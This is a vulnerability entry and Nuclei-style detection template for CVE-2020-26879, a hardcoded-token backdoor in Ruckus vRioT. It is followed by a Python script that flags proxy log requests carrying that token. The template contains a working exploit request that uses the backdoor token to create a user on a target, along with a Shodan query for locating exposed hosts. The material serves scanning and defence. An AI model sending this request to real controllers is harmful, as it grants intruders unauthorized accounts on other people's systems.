Vulnerability Description
Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py, letting unauthenticated attackers interact with the API without authentication.
id: CVE-2020-26879

info:
  name: Ruckus vRioT IoT Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py, letting unauthenticated attackers interact with the API without authentication.
  reference:
    - https://adepts.of0x.cc/ruckus-vriot-rce/
    - https://adepts.of0x.cc
    - https://twitter.com/TheXC3LL
    - https://x-c3ll.github.io
    - https://github.com/alphaSeclab/sec-daily-2020
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26879
    cwe-id: CWE-798
    epss-score: 0.89452
    epss-percentile: 0.99531
    cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: commscope
    product: ruckus_vriot
    shodan-query: html:"RIoT Controller"
  tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

http:
  - raw:
      - |
        POST /service/v1/createUser HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: OlDkR+oocZg=

        {"username": "{{username}}", "password": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"ok": 1}'
          - '{"message":'
        condition: and

      - type: word
        part: body
        words:
          - 'Invalid JSON'
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091140207bf16b8bf23a4e9b7cbe3fe26042ddd90284a0512b30b0d3906c70624022100d9c391d3f0b8e3b27a8fc6da67f66ea95d4a201fdf7d69d665551ee19f6300d8:922c64590222798bb761d5b6d8e72950
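
For defenders, the static Authorization value in the template above is itself an indicator: any request carrying it is using the backdoor. The following is an added example, not part of the original template or of Ruckus code, that flags such requests in reverse-proxy records. It assumes a proxy that logs request headers as JSON lines; the field names and the sample records are constructed for illustration.

```python
import json

BACKDOOR_TOKEN = "OlDkR+oocZg="   # static Authorization value from the template
API_PREFIX = "/service/v1/"       # API path prefix used by the template

# Constructed sample records (JSON lines). The field names are assumptions
# about a proxy that logs request headers; they are not vRIoT log output.
SAMPLE_LOG = """\
{"src":"198.51.100.7","method":"POST","path":"/service/v1/createUser","headers":{"Authorization":"OlDkR+oocZg="},"status":200}
{"src":"192.0.2.10","method":"POST","path":"/service/v1/createUser","headers":{"Authorization":"c2Vzc2lvbg=="},"status":200}
{"src":"203.0.113.44","method":"POST","path":"/service/v1/createUser","headers":{"authorization":"OlDkR+oocZg="},"status":401}
truncated-record
"""


def find_backdoor_use(lines):
    """Return one finding per request that carried the hardcoded token."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip damaged or non-JSON lines
        if not isinstance(rec, dict):
            continue
        headers = rec.get("headers")
        if not isinstance(headers, dict):
            continue
        # Header names are case-insensitive; compare on lowercase keys.
        auth = next((str(v) for k, v in headers.items()
                     if k.lower() == "authorization"), "")
        # Match the bare value, or the value following a scheme word.
        if BACKDOOR_TOKEN not in auth.split():
            continue
        path = str(rec.get("path", ""))
        accepted = rec.get("status") == 200 and path.startswith(API_PREFIX)
        findings.append({
            "line": lineno,
            "src": rec.get("src"),
            "path": path,
            # A 200 on the API suggests the token was honoured (unpatched host).
            "outcome": "accepted" if accepted else "attempted",
        })
    return findings


if __name__ == "__main__":
    for finding in find_backdoor_use(SAMPLE_LOG.splitlines()):
        print(finding)
```

An "accepted" finding warrants reviewing the controller's user list for accounts created around that time, since the request in the template targets /service/v1/createUser.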